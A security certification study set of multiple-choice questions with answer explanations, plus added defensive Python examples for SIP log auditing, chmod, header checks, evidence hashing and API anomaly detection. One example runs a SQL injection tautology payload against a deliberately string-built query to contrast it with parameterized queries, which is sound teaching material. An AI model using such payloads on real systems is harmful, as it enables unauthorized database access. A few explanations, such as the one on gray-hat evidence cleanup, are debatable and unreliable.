A company is looking into integrating on-premise services and cloud services with a cloud service provider (CSP) using an Infrastructure as a Service (IaaS) plan. As a cloud architect works on architectural design, which of the following statements would NOT apply in this case? -The provider must update the firmware and security patches of physical servers. -The provider is responsible for the availability of the software. -The company is liable for legal and regulatory requirements for customer data. -The company must establish separation of duties mechanisms.

-The provider is responsible for the availability of the software. (In a Software as a Service (SaaS) plan, the provider is responsible for the availability of the software. The software may include an appliance with Windows Server 2016 already installed and available to use.)

Auditing SIP (Session Initiation Protocol)-based VoIP logs can reveal evidence of Man-in-the-Middle attacks. When handling requests, what do the call manager and any intermediate servers add to the SIP log file? -A hop count -Their own IP address -A list of IP addresses of previous hops -The IP address of the intended recipient

-Their own IP address (When handling a request, the call manager and each intermediate proxy server prepend a Via header carrying their own address, and those headers are retained in the SIP logs. Reviewing the logged Via chain can reveal a Man-in-the-Middle attack in which an unauthorized proxy has inserted itself to intercept data.)
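
A parser for the Via chain in a logged SIP request, as an added example that is not part of the original study set. The INVITE, host names, addresses and the list of trusted proxies are all constructed; the message places an unknown host between the company proxy and the call manager, which is exactly the pattern the audit is looking for.

```python
"""Parse the Via chain from a logged SIP request and flag hops that are not
known proxies. Each proxy prepends its own Via header, so the topmost Via is
the last hop before the call manager and the bottom one is the originator.

Added example; not from the original page. The SIP message, host names,
addresses and the trusted-proxy list are constructed for illustration.
"""
import re
from typing import Dict, List, Set

# Constructed INVITE as a call manager might log it. A rogue host has inserted
# itself between the company proxy and the call manager.
SAMPLE_INVITE = (
    "INVITE sip:bob@example.com SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 203.0.113.77:5060;branch=z9hG4bK-c3\r\n"
    "Via: SIP/2.0/UDP proxy1.example.com;branch=z9hG4bK-b2\r\n"
    "Via: SIP/2.0/UDP alice-pc.example.com:5060;branch=z9hG4bK-a1;received=10.0.0.5\r\n"
    "From: <sip:alice@example.com>;tag=1928301774\r\n"
    "To: <sip:bob@example.com>\r\n"
    "Call-ID: a84b4c76e66710\r\n"
    "CSeq: 314159 INVITE\r\n"
    "\r\n"
)

TRUSTED_PROXIES: Set[str] = {"proxy1.example.com", "proxy2.example.com"}

# Via: SIP/2.0/<transport> <sent-by>[;param[=value]]...   (compact form is "v:")
VIA_RE = re.compile(r"^(?:Via|v):\s*SIP/2\.0/(\w+)\s+([^\s;]+)((?:\s*;\s*[^;\s]+)*)",
                    re.IGNORECASE)


def parse_via_chain(message: str) -> List[Dict[str, str]]:
    """Return one dict per Via header, topmost first, with the transport,
    the sent-by host and port, and any parameters (branch, received, ...)."""
    hops: List[Dict[str, str]] = []
    head = message.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n"):
        match = VIA_RE.match(line)
        if not match:
            continue
        transport, sent_by, raw_params = match.groups()
        if sent_by.startswith("["):                     # IPv6 literal: [addr]:port
            host = sent_by[: sent_by.index("]") + 1]
        else:
            host = sent_by.rsplit(":", 1)[0]
        hop = {"transport": transport.upper(), "host": host, "sent_by": sent_by}
        for param in raw_params.split(";"):
            param = param.strip()
            if param:
                key, _, value = param.partition("=")
                hop[key.lower()] = value
        hops.append(hop)
    return hops


def untrusted_hops(hops: List[Dict[str, str]], trusted: Set[str]) -> List[str]:
    """Every Via above the originator's own (the bottom one) should belong to a
    known proxy; anything else is an unexpected intermediary to investigate."""
    return [hop["sent_by"] for hop in hops[:-1] if hop["host"] not in trusted]


if __name__ == "__main__":
    chain = parse_via_chain(SAMPLE_INVITE)
    for hop in chain:
        print(hop)
    print("unexpected intermediaries:", untrusted_hops(chain, TRUSTED_PROXIES))
```

The received parameter on the bottom Via is also worth reading: a proxy adds it when the packet's source address differs from the sent-by host, so it records where the request actually came from rather than what the sender claimed.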

Two employees use Instant Messaging (IM) in separate buildings at work. They change the communications over to a video call with one click. Compare the types of communication services and determine which service the employees used. -Unified Communications -Voice over Internet Protocol -Video Teleconferencing -Web Conferencing

-Unified Communications (The employees are utilizing Unified Communications (UC). These solutions are messaging applications that combine multiple communications channels and technologies into a single platform. These channels can include voice, messaging, interactive whiteboards, data sharing, email, and social media.)

A user reported that their Excel spreadsheets delete everything except the active sheet when running a recorded task called "Unhide worksheets" on a workbook. Command prompts have also been popping up on the Windows workstation when it restarts. If the workstation was legitimately compromised, how would an attacker maliciously reconfigure a recorded task on an Excel workbook? -Using Python commands -Using macro commands -Using PowerShell commands. -Using bash commands

-Using macro commands (A document macro is a sequence of actions performed in the context of a word processor, spreadsheet, or presentation file. This can be recorded and re-recorded in the application to change the outcome of the named task.)

What purpose does the Linux command chmod serve? -It displays the contents of a file. -Views or changes read and write permissions for a file or directory. -It transfers the file newFile from a server to a local drive. -Performs string-match search with regex syntax.

-Views or changes read and write permissions for a file or directory. (chmod also sets execute permission and the special mode flags: setuid, setgid, and the sticky bit.)
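
A parser for chmod's symbolic mode syntax, applied to a temporary file and read back with stat, as an added example that is not part of the original study set. It is a simplification of the real command: it ignores the umask that chmod consults when the "who" part is omitted, and does not support copying one class to another (g=u) or the conditional X form.

```python
"""Parser for chmod's symbolic mode syntax (u+x, go-w, o=r, u+s, o+t, ...),
applied to a temporary file and read back with stat.

Added example; not from the original page. Simplifications: the parser
ignores the umask that real chmod consults when 'who' is omitted, and does
not support copying classes (g=u) or the conditional X permission.
"""
import os
import stat
import tempfile
from typing import List

WHO_MASK = {"u": 0o700, "g": 0o070, "o": 0o007}
PERM_MASK = {"r": 0o444, "w": 0o222, "x": 0o111}
# Special mode flags: setuid belongs to 'u', setgid to 'g', the sticky bit to 'o'.
SPECIAL = {"s": {"u": stat.S_ISUID, "g": stat.S_ISGID}, "t": {"o": stat.S_ISVTX}}


def apply_symbolic(mode: int, spec: str) -> int:
    """Return the mode obtained by applying a comma-separated symbolic spec."""
    for clause in spec.split(","):
        i = 0
        who = ""
        while i < len(clause) and clause[i] in "ugoa":
            who += clause[i]
            i += 1
        if not who or "a" in who:
            who = "ugo"
        if i == len(clause):
            raise ValueError(f"missing operator in {clause!r}")
        while i < len(clause):                       # a clause may chain ops: u+x-w
            op = clause[i]
            i += 1
            if op not in "+-=":
                raise ValueError(f"bad operator {op!r} in {clause!r}")
            perms = ""
            while i < len(clause) and clause[i] in "rwxst":
                perms += clause[i]
                i += 1
            bits = 0
            for p in perms:
                for w in who:
                    if p in PERM_MASK:
                        bits |= PERM_MASK[p] & WHO_MASK[w]
                    else:
                        bits |= SPECIAL[p].get(w, 0)  # 's' on 'o' or 't' on 'u'/'g' is a no-op
            if op == "+":
                mode |= bits
            elif op == "-":
                mode &= ~bits
            else:  # '=' clears every bit the class owns, including its special flag
                clear = 0
                for w in who:
                    clear |= WHO_MASK[w] | SPECIAL["s"].get(w, 0) | SPECIAL["t"].get(w, 0)
                mode = (mode & ~clear) | bits
    return mode & 0o7777


def chmod_symbolic(path: str, spec: str) -> int:
    """Apply spec to the file like `chmod spec path` and return the new mode bits."""
    current = stat.S_IMODE(os.stat(path).st_mode)
    os.chmod(path, apply_symbolic(current, spec))
    return stat.S_IMODE(os.stat(path).st_mode)


def demo() -> List[str]:
    """Walk a temp file through a hardening sequence and report each resulting mode."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        os.chmod(path, 0o644)
        return [oct(chmod_symbolic(path, s)) for s in ("u+x", "go-rwx", "a=r")]
    finally:
        os.remove(path)


if __name__ == "__main__":
    print(demo())
    print(oct(apply_symbolic(0o755, "u+s")), oct(apply_symbolic(0o777, "o+t")))
```

The two security-relevant details the parser makes explicit are that "=" wipes the class's special flag as well as its rwx bits (so a=r on a setuid binary drops setuid), and that setuid and setgid only ever attach to the owner and group classes respectively.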

An administrator collects server logs and decides to normalize them into a standard format for reporting. Which option does the administrator use to accomplish this? -rsyslog -nxlog -journalctl -syslog

-nxlog (NXlog is an open-source log normalization tool. One use is to collect Windows logs, which use an XML-based format and normalize them to a syslog format.)

Outline possible tools or methods the team can use to acquire a disk image from a system. (Select all that apply.) []Transfer file system via SMB []Create snapshots of all volumes []Save disk image with FTK Imager []Copy disk with dd command

[]Create snapshots of all volumes (It is possible to create snapshots of the compromised volumes, and in some cases, it can boot a virtual machine, as a full disk image can. This may not be the most efficient method, however.) []Save disk image with FTK Imager (FTK Imager is a data imaging tool that quickly assesses electronic evidence to determine if it requires further analysis. The FTK Imager can save an image of a hard disk in one file or in segments, to reconstruct later if needed.) []Copy disk with dd command (The dd command can copy an entire disk as an image to a USB thumb drive. The team can then analyze the image in a sandbox environment.)

A small business was robbed, and several workstations were stolen. The business stored customer data within a plain spreadsheet on one of the stolen workstations. Customer data and other business files are restored from an external hard drive soon after. Describe the issues that the business faced during this trying time. (Select all that apply.) []Business had a privacy breach. []Customer data was permanently lost. []Customer identity was not stolen. []Data was exfiltrated from the office.

[]Business had a privacy breach. (A privacy breach is where personal data is not collected, stored, or processed in full compliance with the laws or regulations governing personal information. A plain spreadsheet and a computer with no encryption capability are not enough security to hold sensitive data.) []Data was exfiltrated from the office. (Data exfiltration is the methods and tools an attacker uses to take data without authorization from the victim's systems. The data can be physically taken or transferred to an external network or media.)

A web administrator notices a few security vulnerabilities that must be addressed on the company Intranet. The portal must force a secure browsing connection, mitigate script injection, and prevent caching on shared client devices. Determine the secure options to set on the web server's response headers. (Select all that apply.) []Content Security Policy (CSP) []Cache-Control []HTTP Strict Transport Security (HSTS) []Secure Cookies

[]Content Security Policy (CSP) (Content Security Policy (CSP) is a header option that mitigates clickjacking, script injection, and other client-side attacks.) []Cache-Control (Cache-Control is a header option that sets whether the browser can cache responses. Preventing data caching protects confidential and personal information where the client device is shared by multiple users.) []HTTP Strict Transport Security (HSTS) (HTTP Strict Transport Security (HSTS) is a header option that forces the browser to connect using HTTPS only, mitigating downgrade attacks, such as SSL stripping.)
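
A header audit that checks the three requirements in the question (HSTS, CSP, Cache-Control) and, since the fourth option is the one practitioners most often forget to pair with them, the cookie flags too. This is an added example and not part of the original study set; both header sets are constructed, one weak and one hardened.

```python
"""Audit an HTTP response's security headers: force HTTPS (HSTS), mitigate
script injection and clickjacking (CSP), stop caching on shared devices
(Cache-Control), and check cookie flags.

Added example; not from the original page. The two header sets are
constructed: one weak, one hardened.
"""
import re
from typing import Dict, List, Tuple

Headers = List[Tuple[str, str]]   # list of (name, value); Set-Cookie may repeat

WEAK_RESPONSE: Headers = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Cache-Control", "public, max-age=3600"),
    ("Set-Cookie", "SESSIONID=abc123; Path=/"),
]

HARDENED_RESPONSE: Headers = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Content-Security-Policy",
     "default-src 'self'; script-src 'self'; object-src 'none'; frame-ancestors 'none'"),
    ("Cache-Control", "no-store"),
    ("Set-Cookie", "SESSIONID=abc123; Path=/; Secure; HttpOnly; SameSite=Strict"),
]

ONE_YEAR = 31536000


def header_values(headers: Headers, name: str) -> List[str]:
    return [value for key, value in headers if key.lower() == name.lower()]


def parse_csp(value: str) -> Dict[str, List[str]]:
    """\"default-src 'self'; script-src 'self'\" -> {'default-src': [\"'self'\"], ...}"""
    policy: Dict[str, List[str]] = {}
    for directive in value.split(";"):
        tokens = directive.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def audit_headers(headers: Headers) -> List[str]:
    """Return a list of findings; an empty list means every check passed."""
    findings: List[str] = []

    hsts = header_values(headers, "Strict-Transport-Security")
    if not hsts:
        findings.append("HSTS missing: clients can be downgraded to HTTP (SSL stripping)")
    else:
        max_age = re.search(r"max-age=(\d+)", hsts[0], re.IGNORECASE)
        if not max_age or int(max_age.group(1)) < ONE_YEAR:
            findings.append("HSTS max-age shorter than one year")
        if "includesubdomains" not in hsts[0].lower():
            findings.append("HSTS lacks includeSubDomains")

    csp = header_values(headers, "Content-Security-Policy")
    if not csp:
        findings.append("CSP missing: no mitigation for script injection or clickjacking")
    else:
        policy = parse_csp(csp[0])
        script_src = policy.get("script-src", policy.get("default-src", ["*"]))
        if "'unsafe-inline'" in script_src or "*" in script_src:
            findings.append("CSP script-src permits inline or wildcard scripts")
        if "frame-ancestors" not in policy:
            findings.append("CSP lacks frame-ancestors (clickjacking)")

    cache = header_values(headers, "Cache-Control")
    if not cache or "no-store" not in cache[0].lower():
        findings.append("Cache-Control lacks no-store: responses may persist on shared devices")

    for cookie in header_values(headers, "Set-Cookie"):
        name = cookie.split("=", 1)[0].strip()
        attrs = {part.strip().split("=", 1)[0].lower() for part in cookie.split(";")[1:]}
        if "secure" not in attrs:
            findings.append(f"cookie {name} lacks Secure: may be sent over plain HTTP")
        if "httponly" not in attrs:
            findings.append(f"cookie {name} lacks HttpOnly: readable by injected script")

    return findings


if __name__ == "__main__":
    for label, headers in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_headers(headers) or ["OK"])
```

The CSP check is deliberately stricter than "header present": a policy whose script-src carries 'unsafe-inline' provides little protection against the script injection the question is about, so a policy that exists but allows inline scripts is still reported.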

Management is planning a secure network design for corporate mobile devices given to remote employees. One security suggestion involves only allowing corporate apps to access the corporate network when the mobile device is connected via a virtual private network (VPN). Which of the following will support this design? (Select all that apply.) []Context-aware authentication []Unified endpoint management []Security-enhanced Android []Mobile application management

[]Context-aware authentication (Context-aware authentication can, for example, disable screen locks when the mobile device is in a trusted location, such as a home. It can also check whether the network connection is trusted before allowing apps to communicate externally.) []Unified endpoint management (Unified Endpoint Management (UEM) is a suite of applications and features that extends the concept of network access control (NAC) solutions to the mobile device. UEM may include MAM.) []Mobile application management (Mobile Application Management (MAM) sets policies for apps that can process corporate data and prevents data transfer to personal apps. This type of solution configures an enterprise-managed container or workspace.)

Suggest a way to maximize the integrity of the analysis process to ensure non-repudiation is possible. (Select all that apply.) []Perform the analysis as quickly as possible to keep evidence fresh. []Create a hash before and after analysis and compare the checksums. []Use a write blocker during analysis to prevent data from being changed. []Perform the analysis with a group of witnesses present.

[]Create a hash before and after analysis and compare the checksums. (The analyst hashes the evidence image immediately at acquisition, performs the analysis, and hashes it again afterward. If the two digests match, the contents were not altered during analysis. Prefer SHA-256; MD5 is still widely recorded alongside it, but it is no longer collision resistant and should not stand alone.) []Use a write blocker during analysis to prevent data from being changed. (Connecting the source device through a write blocker prevents anything, including the operating system's own automatic writes, from modifying the disk during imaging and examination.)
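The before-and-after hashing procedure above, as an added example that is not part of the original study set: Python that hashes an evidence image in streaming chunks (so multi-gigabyte images need not fit in memory), writes a chain-of-custody line, and then shows the comparison failing after a single byte is written to the image, which is exactly what a missing write blocker allows. The "image" is a constructed temporary file, and the analyst name and log format are assumptions.

```python
"""Hash an evidence image before and after analysis and record both digests.
Uses a constructed temporary file in place of a real disk image."""
import hashlib
import os
import tempfile
from datetime import datetime, timezone

CHUNK = 1 << 20  # 1 MiB reads keep memory flat on large images


def hash_file(path: str, algorithms=("md5", "sha256")) -> dict:
    """Return {algorithm: hexdigest} for the file, computed in a single pass."""
    hashers = {name: hashlib.new(name) for name in algorithms}
    with open(path, "rb") as fh:
        while chunk := fh.read(CHUNK):
            for h in hashers.values():
                h.update(chunk)
    return {name: h.hexdigest() for name, h in hashers.items()}


def verify_integrity(path: str, baseline: dict) -> bool:
    """True only if every algorithm recorded in the baseline still matches."""
    current = hash_file(path, tuple(baseline))
    return all(current[name] == digest for name, digest in baseline.items())


def custody_entry(event: str, digests: dict, analyst: str) -> str:
    """One chain-of-custody line (assumed format: UTC time, analyst, event, digests)."""
    ts = datetime.now(timezone.utc).isoformat(timespec="seconds")
    return f"{ts} {analyst} {event} " + " ".join(f"{k}={v}" for k, v in digests.items())


def demo() -> tuple:
    """Acquire, verify untouched, then simulate an unblocked write and verify again."""
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(b"constructed evidence image " * 1000)  # constructed sample data
        path = tmp.name
    try:
        baseline = hash_file(path)
        log = [custody_entry("acquired", baseline, "analyst1")]
        ok_before = verify_integrity(path, baseline)  # True: nothing has changed yet
        with open(path, "r+b") as fh:                 # no write blocker: one byte flipped
            fh.seek(0)
            fh.write(b"X")
        ok_after = verify_integrity(path, baseline)   # False: digests no longer match
        log.append(custody_entry("verified", hash_file(path), "analyst1"))
        return ok_before, ok_after, log
    finally:
        os.unlink(path)


if __name__ == "__main__":
    before, after, entries = demo()
    print("intact before analysis:", before, "| intact after write:", after)
    print("\n".join(entries))
```

Recording two algorithms costs one extra pass over nothing (both hashers consume the same chunks), and it means a later challenge to MD5 alone does not invalidate the record.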

Which attack types are client-side attacks that involve malicious code running in the user's browser? (Select all that apply.) []Cross-site scripting []Session replay []Directory traversal []Integer overflow

[]Cross-site scripting (A cross-site scripting (XSS) attack exploits the fact that the browser trusts scripts that appear to come from a site the user has chosen to visit, so attacker-supplied script runs with that site's privileges.) []Session replay (Session replay is classed here as a client-side attack: code running in the user's browser captures the session token, which the attacker then reuses to impersonate the user.)

An application's appliance template virtual machine (VM) is running on the production network. A Linux administrator logs in to the system as the default root account to verify network settings. The appliance was deployed "out of the box" and is running healthy. A security engineer would have some concerns about which of the following configurations? (Select all that apply.) []Traffic over port 443 []Application logging errors []Default template settings []Log on as superuser

[]Default template settings (Default template virtual machines and appliances are attractive targets because their baseline settings and credentials may be publicly documented. Systems should be hardened immediately after deployment, before they are exposed on the production network.) []Log on as superuser (A superuser account, such as root on a Linux system, has no restrictions over system access. Direct root logon should be disabled in favor of named administrator accounts or groups that elevate when needed, so that actions are attributable.)

Unlike transport layer security (TLS), internet protocol security (IPSec) can use two modes. One mode encrypts only the payload of the IP packet, leaving the IP address unencrypted. The other mode encrypts the whole IP packet and adds a new IP header. What are these modes? (Select all that apply.) []Transport []Tunnel []Stateful []Stateless

[]Transport (In transport mode, IPsec encrypts only the payload of the IP packet and leaves the original IP header in the clear. It is typically used for host-to-host protection within a private network.) []Tunnel (In tunnel mode, IPsec encrypts the entire original packet, header included, and adds a new outer IP header. It is the mode used by site-to-site and remote-access VPNs across unsecured networks.)

A network administrator can conduct a site survey to find potential placement locations of wireless access points (WAP) using which of the following? (Select all that apply.) []Wireless controller []Heat map []Wi-Fi Protected Setup (WPS) []Wi-Fi analyzer

[]Heat map (A heat map is a visual of the information gathered from a Wi-Fi analyzer. It can show where a signal is strong (red) or weak (green/blue), and which channel is being used.) []Wi-Fi analyzer (A Wi-Fi analyzer is software on a laptop or mobile device with a wireless network adapter. Information about the signal is obtained at regularly spaced points as the surveyor moves around.)

Multiple private data sources ingest pictures to a machine learning tool on Google Cloud Platform to find specific species of butterflies. The pictures are tagged by creator names in the company before being loaded onto the various data source locations. What type of security solution can the IT team implement to prevent tainted training data from getting to the machine learning tool? (Select all that apply.) []Keep ML algorithm a secret. []Use algorithms that use collision avoidance. []Prevent infiltration of external vendors. []Use SOAR to check picture properties

[]Keep ML algorithm a secret. (Keeping the machine learning (ML) algorithm secret is a security-through-obscurity measure. If the algorithm is known, an adversarial attack can craft images that trick the ML tool into recognizing an image as something else.) []Use SOAR to check picture properties (Security orchestration, automation, and response (SOAR) with automated runbooks can check saved pictures before they are ingested into the machine learning tool, preventing malicious data from entering the training set.)

Which type of certificate does Secure/Multipurpose Internet Mail Extensions (S/MIME) NOT use to sign a message? (Select all that apply.) []Machine certificate []Email certificate []User certificate []Root certificate

[]Machine certificate (Machine certificates are used to identify servers, PCs, smartphones, and other network devices. This allows devices to trust other devices on the network.) []User certificate (User certificates are used in a directory-based network for a wide range of use cases. In Active Directory (AD), there are user certificate templates for standard users, administrators, smart card logon/users, and recovery agent users.) []Root certificate (The root certificate is the one that identifies the Certificate Authority (CA) itself. The root certificate is self-signed.)

Which of the following will reduce the risk of data exposure between containers on a cloud platform? (Select all that apply.) []Secrets management []Namespaces []Control groups []Public subnets

[]Namespaces (In a container engine such as Docker, each container is isolated from the others through separate kernel namespaces. Namespaces prevent one container from seeing or interacting with the processes, filesystem mounts, and network interfaces of another.) []Control groups (Control groups (cgroups) limit the CPU, memory, and I/O a container may consume, so one container cannot starve the others in a DoS-type attack. Together, namespaces and control groups reduce the risk of data exposure between containers.)

An organization remodels an office which results in the need for higher security during construction. Placing a security guard by the data center utilizes which control types? (Select all that apply.) []Compensating []Preventative []Operational []Corrective

[]Operational (Operational control is implemented primarily by people rather than systems. For example, security guards and training programs are operational controls.) []Preventative (A preventative control acts to eliminate or reduce the likelihood that an attack can succeed. A preventative control operates before an attack can take place.)

An organization suffers a breach and learns a lesson in the proper approach of maintaining archived data. An engineer writing a report focuses on which areas? (Select all that apply.) []Retention policies []Attack walkthrough []Lessons learned []Response plan

[]Retention policies (A retention policy refers to the safe storage and archiving of live or backed up data. A retention policy should be a proactive measure and not a reactive one.) []Lessons learned (Lessons learned address the incident and responses to identify whether procedures or systems could be improved. The need for an improved retention policy is an example.)

Users in a company complain that they cannot reach internal servers when using WiFi. IT discovers that the SSID of the broadcasted network is similar to the company's but is not legitimate. IT plans on searching the network to remove which disruptive technologies? (Select all that apply.) []Jamming attack []Rogue access point []Evil twin []Disassociation attack

[]Rogue access point (A rogue access point is one that has been installed on the network without authorization, whether with malicious intent or not.) []Evil twin (A rogue WAP masquerading as a legitimate one is called an evil twin. An evil twin might just have a similar name (SSID) to the legitimate one.)

A security consultant recently audited a company's cloud resources and web services. The consultant found ineffective secrets management and a lack of input validation mechanisms. What type of attack would the company's cloud resources be susceptible to at its current state? (Select all that apply.) []SQL injection []Client-side request forgery []API attack []Resource exhaustion

[]SQL injection (A Structured Query Language (SQL) injection attack adds SQL syntax to input that an application concatenates into a query, so the attacker's own statements execute against the database. Input validation and parameterized queries prevent this type of attack.) []API attack (Application Programming Interfaces (APIs) allow consumers to automate tasks on a web or cloud resource. Ineffective secrets management could compromise these services on a wide scale if the threat actor retrieves API keys.) []Resource exhaustion (Resource exhaustion uses privileged access to deplete resources, for example by writing thousands of files to disk or spinning up compute. Leaked credentials from ineffective secrets management give an attacker the access needed to run such processes.)
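The injection described above next to its fix, as an added example that is not part of the original study set: a login check written two ways against an in-memory SQLite database, one building the query from strings and one binding parameters, plus the allow-list input validation the answer mentions. The table, rows, and plaintext passwords are constructed for the demonstration only (a real system stores password hashes).

```python
"""String-built vs parameterized SQL, with allow-list input validation.
Database contents are constructed for the demonstration."""
import re
import sqlite3

USERNAME_RE = re.compile(r"^[a-z0-9_]{3,32}$")  # assumed username policy


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "s3cret", "admin"),   # plaintext only to keep the demo short
        ("bob", "hunter2", "user"),
    ])
    return conn


def is_valid_username(value: str) -> bool:
    """Allow-list validation: reject anything outside the expected character set."""
    return USERNAME_RE.fullmatch(value) is not None


def login_vulnerable(conn, username: str, password: str):
    """Attacker-controlled text is spliced into the SQL and parsed as SQL."""
    sql = (f"SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchall()


def login_safe(conn, username: str, password: str):
    """Parameters are bound as data by the driver and can never change the query."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def demo():
    conn = make_db()
    payload = "' OR '1'='1"  # classic tautology: (user='alice' AND pw='') OR '1'='1'
    rows_vuln = login_vulnerable(conn, "alice", payload)  # every row comes back
    rows_safe = login_safe(conn, "alice", payload)        # no row has that password
    return len(rows_vuln), len(rows_safe)


if __name__ == "__main__":
    print("rows returned (vulnerable, safe):", demo())
    print("validation rejects payload:", not is_valid_username("' OR '1'='1"))
```

Validation and parameterization are complementary: the allow-list stops obviously malformed input at the edge, while the bound parameters mean that even a value that passes validation cannot alter the query structure.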

An increase in malware detection, due to certain web browsing activity in the workplace, caused the information systems security office (ISSO) to deploy a unified threat manager on the network. How would this network appliance help reduce malware on client workstations? (Select all that apply.) []Scan web traffic []Block malware []Block URLs []Encrypt traffic

[]Scan web traffic (Many UTM appliances include a malware scanner that inspects web traffic, using signatures and heuristic analysis of packet content and behavior to determine whether a connection is malicious.) []Block malware (A UTM acts like an intrusion prevention system (IPS) that can block network connections or prevent a file from downloading.) []Block URLs (The UTM (Unified Threat Management) is an all-in-one security appliance. Its ability to block specific URLs or websites comes from its content filtering feature; even uncategorized sites that match a blocked category, such as inappropriate images, can be set to block.)

Network administrators are configuring a demilitarized zone (DMZ) to provide Internet-facing services to customers. These admins will perform minimum configuration and security to rapidly deploy two web servers that are load balanced. Which of the following will most likely be configured in this DMZ? (Select all that apply.) []Scheduling algorithm []Zero trust []Bastion hosts []Virtual IP addresses

[]Scheduling algorithm (The scheduling algorithm is the code and metrics that determine which node is selected to process each incoming request, for example round robin.) []Bastion hosts (Bastion hosts are servers configured with minimal services to run in a demilitarized zone (DMZ), also called a screened subnet. A bastion host would not hold any data that could be a security risk to the internal network.) []Virtual IP addresses (A virtual Internet Protocol (IP) address is a single address, typically public in a DMZ, shared by a load-balanced cluster of servers. Clients connect to the virtual IP; the active node answers for it until a standby node takes over.)

A vulnerability database loaded on a scanning tool such as Tenable Nessus will commonly show which of the following properties? (Select all that apply.) []Packet data []Score []Dictionary []Security data inputs

[]Score (The Common Vulnerability Scoring System (CVSS) is maintained by the Forum of Incident Response and Security Teams (first.org/cvss). Base scores range from 0.0 to 10.0; the v3.x qualitative ratings are Low 0.1 to 3.9, Medium 4.0 to 6.9, High 7.0 to 8.9, and Critical 9.0 to 10.0.) []Dictionary (Common Vulnerabilities and Exposures (CVE) is a dictionary of vulnerabilities in published operating systems and application software provided by cve.mitre.org. Each entry includes a CVE ID, a brief description, a URL reference list, and the date of entry.)

A gray hat hacker will perform which of the following when using hacking techniques on an organization or software? (Select all that apply.) []Move laterally on the network. []Seek a bug bounty []Cleanup evidence []Use a white box

[]Seek a bug bounty (A gray hat hacker looks for vulnerabilities in a product or network without seeking the owner's approval, then often asks for voluntary compensation such as a bug bounty.) []Cleanup evidence (A gray hat hacker will clean up evidence of an attack, such as a backdoor, because the exploit is not going to be used for extortion. White hat hackers do the same.)

What is an antivirus and anti-malware software capable of doing to protect a computer system? (Select all that apply.) []Signature-based detection []Detect Trojans []Disk encryption []Application-aware filtering

[]Signature-based detection (The first generation of antivirus (AV) software is characterized by signature-based detection and prevention of known viruses. Computer viruses are computer programs that replicate, when executed, by modifying and inserting themselves into other computer programs.) []Detect Trojans (Anti-malware is the next generation of antivirus software that can detect other malicious software such as Trojans, spyware, and even cryptojackers.)

A cloud service provider (CSP) dashboard provides a view of all applicable logs for cloud resources and services. When examining the application programming interface (API) logs, the cloud engineer sees some odd metrics. Which of the following are examples that would concern the engineer? (Select all that apply.) []Average error rate of 78% []High native-cloud firewall cost []Low latency responses []Spike in API calls

[]Spike in API calls (An unexplained spike in Application Programming Interface (API) calls could be an indicator of a DDoS attack or of automated abuse such as key guessing. This metric is captured in requests per second or per minute.) []Average error rate of 78% (Error rates measure the number of errors as a percentage of total calls, usually broken down by error type. A high rate may indicate an overloaded system or a security issue, such as repeated unauthorized requests.)
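The two indicators above turned into detection logic, as an added example that is not part of the original study set: Python that buckets constructed API access-log lines by minute, computes call volume and error rate per bucket, and flags any minute whose volume is well above the median or whose error rate crosses a threshold. The log line format, the 5x spike factor, and the 50% error threshold are assumptions; a real deployment reads the cloud provider's log export and tunes the thresholds to its baseline.

```python
"""Detect API call spikes and elevated error rates in per-minute buckets.
Log lines are constructed for the demonstration."""
import statistics
from collections import defaultdict
from typing import Dict, List, Tuple


def build_sample_log() -> List[str]:
    """Constructed: two quiet minutes, then a minute of one call per second, mostly rejected."""
    lines = [f"2024-05-01T10:00:{s:02d}Z GET /v1/items 200" for s in (5, 20, 41)]
    lines += [f"2024-05-01T10:01:{s:02d}Z GET /v1/items 200" for s in (2, 30, 55)]
    for i in range(60):  # key guessing against an admin endpoint: 9 of 10 calls fail
        status = 401 if i % 10 else 200
        lines.append(f"2024-05-01T10:02:{i:02d}Z GET /v1/admin/keys {status}")
    return lines


def parse_line(line: str) -> Tuple[str, int]:
    """Assumed format: '<ISO timestamp> <method> <path> <status>'; returns (minute, status)."""
    ts, _method, _path, status = line.split()
    return ts[:16], int(status)  # '2024-05-01T10:02' is the minute bucket


def per_minute(lines: List[str]) -> Dict[str, Tuple[int, float]]:
    """Map each minute to (call count, error rate) where status >= 400 counts as an error."""
    calls: Dict[str, int] = defaultdict(int)
    errors: Dict[str, int] = defaultdict(int)
    for line in lines:
        minute, status = parse_line(line)
        calls[minute] += 1
        if status >= 400:
            errors[minute] += 1
    return {m: (calls[m], errors[m] / calls[m]) for m in calls}


def detect(stats: Dict[str, Tuple[int, float]],
           spike_factor: float = 5.0, error_threshold: float = 0.5) -> List[str]:
    """Flag minutes with volume >= spike_factor * median, or error rate >= threshold."""
    baseline = max(statistics.median(c for c, _ in stats.values()), 1)
    findings = []
    for minute, (count, err_rate) in sorted(stats.items()):
        if count >= spike_factor * baseline:
            findings.append(f"{minute}: {count} calls/min ({count / baseline:.0f}x median)")
        if err_rate >= error_threshold:
            findings.append(f"{minute}: error rate {err_rate:.0%}")
    return findings


if __name__ == "__main__":
    for f in detect(per_minute(build_sample_log())):
        print(f)
```

Using the median rather than the mean as the baseline matters here: a single attack minute would otherwise drag the mean up and hide itself.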

Identify the concepts that function as alternatives to kill chain life cycle analysis in threat intelligence. (Select all that apply.) []Continuity of operation planning (COOP) []The Diamond Model of Intrusion Analysis []Incident response plans []MITRE ATT&CK

